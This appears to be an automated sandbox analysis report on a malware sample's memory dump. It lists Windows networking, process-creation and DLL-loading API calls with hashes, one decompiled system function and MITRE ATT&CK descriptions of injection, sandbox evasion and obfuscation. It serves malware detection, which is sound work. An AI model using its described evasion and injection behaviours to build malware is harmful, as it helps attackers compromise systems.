Opcode Fuzzy Hash: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
Instruction Fuzzy Hash: 39014FB2905219AFCB00DF98D841AEF7BB8EB48210F118189FD08A7204D670EE10CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00338840, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 003388A8

Strings

Conn, xrefs: 00338868
ConnectA, xrefs: 003388A2, 003388A7
ectA, xrefs: 0033886F
rnetConnectA, xrefs: 0033889E, 003388A6
rnet, xrefs: 00338861
InternetConnectA, xrefs: 0033889A, 003388A5
Inte, xrefs: 0033885A

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
Instruction ID: beb6fba96d31f326d218bd9fc1e39cd41a69a9afafbcb58c53a686130096f838
Opcode Fuzzy Hash: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
Instruction Fuzzy Hash: A601E9B2915118AFCB14DF99D981EEF77B9EB48310F154289BE08A7241D630EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00338835, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 44networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 003388A8

Strings

Conn, xrefs: 00338868
ConnectA, xrefs: 003388A2, 003388A7
ectA, xrefs: 0033886F
rnetConnectA, xrefs: 0033889E, 003388A6
rnet, xrefs: 00338861
InternetConnectA, xrefs: 0033889A, 003388A5
Inte, xrefs: 0033885A

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 6421ef37c160f95d258ae87b63b763931ced966f26403d12b9962d89bf095993
Instruction ID: 8b46120e6721210e3262cf230211ead895482ae931c9d51fb00fbd8b4d3b5511
Opcode Fuzzy Hash: 6421ef37c160f95d258ae87b63b763931ced966f26403d12b9962d89bf095993
Instruction Fuzzy Hash: 82012DB2905158AFCB15CF98D981EEFBBB8EF49310F15418CFA49A7200C630AA10CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00338936, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 40networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0033899C

Strings

Http, xrefs: 0033895A
SendRequestA, xrefs: 00338992, 0033899A
RequestA, xrefs: 00338996, 0033899B
Send, xrefs: 00338961
estA, xrefs: 0033896F
HttpSendRequestA, xrefs: 0033898E, 00338999
Requ, xrefs: 00338968

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Http$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-1070052511
Opcode ID: 9005f40e2f1d2b4610604496bfbe0056b836f2d12a5c3eac4e21c7b7bf774c2c
Instruction ID: 089f2aa651d3bfa0cc0ded9f40e53ad8a140587b302d4f56ecf443c34e2ad524
Opcode Fuzzy Hash: 9005f40e2f1d2b4610604496bfbe0056b836f2d12a5c3eac4e21c7b7bf774c2c
Instruction Fuzzy Hash: 8D01A2B18092599FCB15CF98C941ABF7B78EF58260F158289FC686B201D73099118BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00338764, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 74networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00338827

Strings

InternetOpenA, xrefs: 0033881D, 00338825
rnet, xrefs: 003387F1
A, xrefs: 003387FF
Inte, xrefs: 003387EA
Open, xrefs: 003387F8
rnetOpenA, xrefs: 00338821, 00338826

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: 513bab672a97937dba3491a2229fa53e6d3de2e9311d7470f98f7a78bfc352b9
Instruction ID: e20ba3971e1f5042a957e3d61d8f4375308be62618bd0a855a4d4595f9101e2d
Opcode Fuzzy Hash: 513bab672a97937dba3491a2229fa53e6d3de2e9311d7470f98f7a78bfc352b9
Instruction Fuzzy Hash: 18115EB1500218AFDB14DF98DC81DFB77BDEF88710F158549FE1897241C631A9108BE0

Uniqueness

Uniqueness Score: -1.00%

Function 003387D0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00338827

Strings

InternetOpenA, xrefs: 0033881D, 00338825
rnet, xrefs: 003387F1
A, xrefs: 003387FF
Inte, xrefs: 003387EA
Open, xrefs: 003387F8
rnetOpenA, xrefs: 00338821, 00338826

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
Instruction ID: 6321565be80491ea4251b2e6a9e9e89db44d91d7585c04b0fcecf66bb9f88965
Opcode Fuzzy Hash: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
Instruction Fuzzy Hash: 14F01DB2901218AF8B14DF98DC419EB77B8FF48310F048589BD1897201D630AE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 003387C8, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 40networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00338827

Strings

InternetOpenA, xrefs: 0033881D, 00338825
rnet, xrefs: 003387F1
A, xrefs: 003387FF
Inte, xrefs: 003387EA
Open, xrefs: 003387F8
rnetOpenA, xrefs: 00338821, 00338826

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: d964a6424758bc290d0dcc376144d7754081d0a75f88225d2d34143ac1a72807
Instruction ID: 115d5324c4bc466819ce69303a4f9d30dd0eb9185e52a160e4e0485df78ccb63
Opcode Fuzzy Hash: d964a6424758bc290d0dcc376144d7754081d0a75f88225d2d34143ac1a72807
Instruction Fuzzy Hash: 50F031B5901218AFCB14DF99D845DEB7779FF48340F048149BE586B301D730AA11CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00336ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00336F78

Strings

wininet.dll, xrefs: 00336F2E, 00336F37
net.dll, xrefs: 00336F41, 00336FC7, 00336F9F, 00336FAB, 00336FD3

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 92b6c21bbef76c3a8d5bc1276f6f2fb9934f4006bd11854a24bae3bdd5b7b0af
Instruction ID: 1ddda3d400bc198f2bd45d717ebc3364150993d264cbd2f011ec8e8e488bed7a
Opcode Fuzzy Hash: 92b6c21bbef76c3a8d5bc1276f6f2fb9934f4006bd11854a24bae3bdd5b7b0af
Instruction Fuzzy Hash: FC316FB5601704BFC716DFA8D8E2FA7B7B8AB48700F00851DF61A9B241D774A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00336EC6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00336F78

Strings

wininet.dll, xrefs: 00336F2E, 00336F37
net.dll, xrefs: 00336F41, 00336F9F, 00336FAB

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 020aa964af0b5a46edca64af8baca5a582ce150214c1b80f626d5036b9e2a825
Instruction ID: d214508fe33fa92b605004dce27d67c873c7e6b9f589c53e79f859e62c7ac9bb
Opcode Fuzzy Hash: 020aa964af0b5a46edca64af8baca5a582ce150214c1b80f626d5036b9e2a825
Instruction Fuzzy Hash: 803191B1601304BFD716DFA8D8E2F6AB7B8EF48700F10801DF6199B241D374A555CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003384B2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00323B93), ref: 003384ED

Strings

.z`, xrefs: 003384DC, 003384E8

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 82cebc4d756bfe32ba40f26b2e8c5500afbd779ce6c5a3c43fe16850a519672a
Instruction ID: c807aa3627b1efde80d38bfa6576b886b7141ffd77ad005c63460d86887b8904
Opcode Fuzzy Hash: 82cebc4d756bfe32ba40f26b2e8c5500afbd779ce6c5a3c43fe16850a519672a
Instruction Fuzzy Hash: 35E022B1200205ABDB14EF54CC84EE737ACAF84350F058444F92C6B382CA31E900CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 003384C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00323B93), ref: 003384ED

Strings

.z`, xrefs: 003384DC, 003384E8

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 66d14c9d0edd97adf8cb422bcb9c16fa8c46f97462f04cd7f335a5a1f917b8f9
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 6FE01AB12002046BDB14DF59DC45EA777ACAF88750F014554BA085B241CA30E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 003385C5, Relevance: 3.1, APIs: 2, Instructions: 83processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00338584
LookupPrivilegeValueW.ADVAPI32(00000000,?,0032CF92,0032CF92,?,00000000,?,?), ref: 00338650

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalLookupPrivilegeProcessValue
String ID:
API String ID: 65721159-0
Opcode ID: f79c3891d5eaf062a7ebf0fb341b316115b8ba6f28b71e35ca19c6051fed3b0e
Instruction ID: f1352f43b3089b155f1299e128527deddcfa08022ec32e8642853c5291837b84
Opcode Fuzzy Hash: f79c3891d5eaf062a7ebf0fb341b316115b8ba6f28b71e35ca19c6051fed3b0e
Instruction Fuzzy Hash: 332107B6200208AFDB15DF99DC81EEB77ADAF8C350F158659FA0D97241CA30E811CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00327260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 003272BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 003272DB

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
Instruction ID: 32f6611b68ac9c5a79adfb68cc81f5887643db85af1e3d28a68b3af4a49e49ba
Opcode Fuzzy Hash: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
Instruction Fuzzy Hash: 6201A731A80328B6E722A694AC43FFE776C5B00B51F154515FF04BE1C2E6A4690647F5

Uniqueness

Uniqueness Score: -1.00%

Function 00338589, Relevance: 1.6, APIs: 1, Instructions: 69processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00338584

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 2a986c7ffc47560a4c40bfce63e6afafea41a096d43dfa205575221079f263de
Instruction ID: 5b9f7b97bcdcd73acdff2919ab9e3ed3c474bfdd3ff4ba7e3d2108484910347d
Opcode Fuzzy Hash: 2a986c7ffc47560a4c40bfce63e6afafea41a096d43dfa205575221079f263de
Instruction Fuzzy Hash: 82111CB2204248ABCB05DF98DC80EEB77ADAF8D350F158258FE4997241CA30E815CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00329B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00329B82

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: ec77247c42a33163043c4b91d990c052c7e4e7583cdf8d885e50720226559e11
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: EC011EB5D4020DABDF11EAE4EC82F9EB3789B54308F0042A5E9089B241F671EB54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00338530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00338584

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: ebb3916222576d3b2def031368d3180ba1625b8cfb3908565353dd79225ae65b
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 3B015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251DA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0033852D, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00338584

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: efaeace6b701da33aa26a2d8aadb5ae997c6b47f3ec7f7eeaa7439db434d811b
Instruction ID: e2bf73a2d6e165157e1661bfea955ea2ee163073ff6fc5692e6e8632942f9b29
Opcode Fuzzy Hash: efaeace6b701da33aa26a2d8aadb5ae997c6b47f3ec7f7eeaa7439db434d811b
Instruction Fuzzy Hash: FD01F2B2214109ABCB04CF98DC80DEB37AAAF8C710F158648FA5D97242C630E8418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00337000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0032CCC0,?,?), ref: 0033703C

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 7605c94549fd1d28dc1871aeb6e7ddf134353a8e3cc3ab0d1d32422401d6de41
Instruction ID: 3400005f5565f0814dc39608c3ecd6cf86511a3ecf28a9d734cd701582164ee9
Opcode Fuzzy Hash: 7605c94549fd1d28dc1871aeb6e7ddf134353a8e3cc3ab0d1d32422401d6de41
Instruction Fuzzy Hash: 40E09A733803043AE33175A9AC43FA7B39CCB81B21F15002AFA0DEB2C1D999F90146A8

Uniqueness

Uniqueness Score: -1.00%

Function 00336FF4, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0032CCC0,?,?), ref: 0033703C

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 0b8796f3b7bbd77c6159b10f1a224331a3ddfc3a7ce78d97cf2956406eb85405
Instruction ID: 201b7a73d3c04024b1a6804e5de664df2a72a43b48d164d3be6d2a051b3e331a
Opcode Fuzzy Hash: 0b8796f3b7bbd77c6159b10f1a224331a3ddfc3a7ce78d97cf2956406eb85405
Instruction Fuzzy Hash: 35F02B733803003BD33135189C43FE377588B91B10F144069F649EF2C2C5A6F8014654

Uniqueness

Uniqueness Score: -1.00%

Function 00338611, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0032CF92,0032CF92,?,00000000,?,?), ref: 00338650

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 35f889b646d3f12dff17e4550f5b924e72b6cf9dc5ca2e7fff9b8442954480db
Instruction ID: 9bcec3eab03b80d99ad124a79b2bc67251c54397eeed3c0fb43d38cab0a4488f
Opcode Fuzzy Hash: 35f889b646d3f12dff17e4550f5b924e72b6cf9dc5ca2e7fff9b8442954480db
Instruction Fuzzy Hash: DEF06DB1600714AFCB11DF64DC85EE777A9EF89310F118165FA0C9B251CA30A811CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00338480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00333506,?,00333C7F,00333C7F,?,00333506,?,?,?,?,?,00000000,00000000,?), ref: 003384AD

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: e6d08a20ecd523cc976fb8575cda0ad592c1fdda1a792b92ef6d8fdaafeaf428
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: C2E012B1200208ABDB14EF99DC81EA777ACAF88650F118558BA085B282CA30F9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00338620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0032CF92,0032CF92,?,00000000,?,?), ref: 00338650

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: a3101d0388ead5a72e368fe972c324f81bc957deb09f4746b60ead32007ab039
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 08E01AB12002086BDB10DF49DC85EE737ADAF88650F018154BA085B241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0032D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00327C63,?), ref: 0032D42B

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 84c1e1f58343beeae71c54d8a54ca22d46bcaf7b2f52718d26de2f0c0f099820
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: BAD0A7727903043BE610FAA49C07F2632CD9B44B00F494064F948DB3C3DD64F5004161

Uniqueness

Uniqueness Score: -1.00%

Function 0319967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03199694

Memory Dump Source

Source File: 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: true

Associated: 00000006.00000002.1030239958.000000000324B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.1030249513.000000000324F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c6874bf06fb18ca656f73db5e5ddf4f61114e8b8dc3cac415e334b82ad9dc519
Instruction ID: 6373dc9dcc1f2a29989ae2a22bdc463313d7309fff97a38e22015782d756a123
Opcode Fuzzy Hash: c6874bf06fb18ca656f73db5e5ddf4f61114e8b8dc3cac415e334b82ad9dc519
Instruction Fuzzy Hash: 1AB09BF19018C5D7EA11D7655708717790477D4741F56C056D1020681E4778C091F5B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 031EFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E031EFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0319CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E031E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E031E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x031efdda
0x031efde2
0x031efde5
0x031efdec
0x031efdfa
0x031efdff
0x031efe0a
0x031efe0f
0x031efe17
0x031efe1e
0x031efe19
0x031efe19
0x031efe19
0x031efe20
0x031efe21
0x031efe22
0x031efe25
0x031efe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031EFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 031EFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 031EFE2B

Memory Dump Source

Source File: 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: true

Associated: 00000006.00000002.1030239958.000000000324B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.1030249513.000000000324F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 7fcabd6613996e30adf4adeeed625f3a9af3012021e79011aad7565b968a618c
Instruction ID: d99a4d153f1d4fc3e2e703768acdef76fe849ce4aa9e38a4f99d5b8dace75706
Opcode Fuzzy Hash: 7fcabd6613996e30adf4adeeed625f3a9af3012021e79011aad7565b968a618c
Instruction Fuzzy Hash: 7AF0F67A600601BFEA249A45DC02F23BF5AEB49B70F154315F6285A1D1DB63F87196F0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

